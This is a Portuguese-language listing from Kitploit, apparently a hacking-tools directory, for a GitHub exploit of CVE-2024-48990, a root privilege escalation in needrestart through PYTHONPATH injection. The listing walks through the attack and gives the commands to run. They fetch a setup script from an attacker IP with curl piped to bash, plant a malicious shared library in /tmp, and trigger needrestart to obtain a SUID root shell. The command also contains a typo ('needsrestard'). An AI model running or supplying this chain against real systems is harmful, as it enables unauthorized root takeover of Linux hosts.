Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-48990 — Exploit completo para needsrestart setuid root shell | Kitploit
Ferramentas/GitHubGitHub/mladicstefan/cve-2024-48990
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubmladicstefan/cve-2024-48990

CVE-2024-48990

Exploit completo para needsrestart setuid root shell

Ver Repositório
há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-48990 Exploit

Escalação de Privilégio Local no needrestart < 3.8 via injeção de PYTHONPATH.

Como Funciona

  1. needrestart executa como root e verifica todos os processos
  2. Encontra nosso processo Python, lê PYTHONPATH=/tmp/.m de /proc/[pid]/environ
  3. Executa Python como root com nosso PYTHONPATH malicioso
  4. A importação do Python carrega /tmp/.m/importlib/__init__.so (nossa biblioteca maliciosa)
  5. Construtor no .so executa como root antes mesmo do Python iniciar
  6. Cria um bash SUID em /tmp/rootbash
  7. Execute /tmp/rootbash -p para shell root

Ponto Chave: o needrestart confia em variáveis de ambiente de processos não privilegiados e as utiliza ao executar interpretadores como root.

Uso

Atacante:

root@kitploit:~
./compile.sh
python3 -m http.server 8000

Alvo:

root@kitploit:~
curl -sf http://10.10.14.109:8000/setup_exploit.sh | bash -s 10.10.14.109 8000
cd /tmp/.m && PYTHONPATH=/tmp/.m python3 e.py

O processo e.py deve travar e gerar root assim que o seguinte for executado em um segundo terminal:

root@kitploit:~
sudo needsrestard

o primeiro terminal iniciará um shell root

Créditos

Qualys Threat Research Unit - CVE-2024-48990

Baixar ferramenta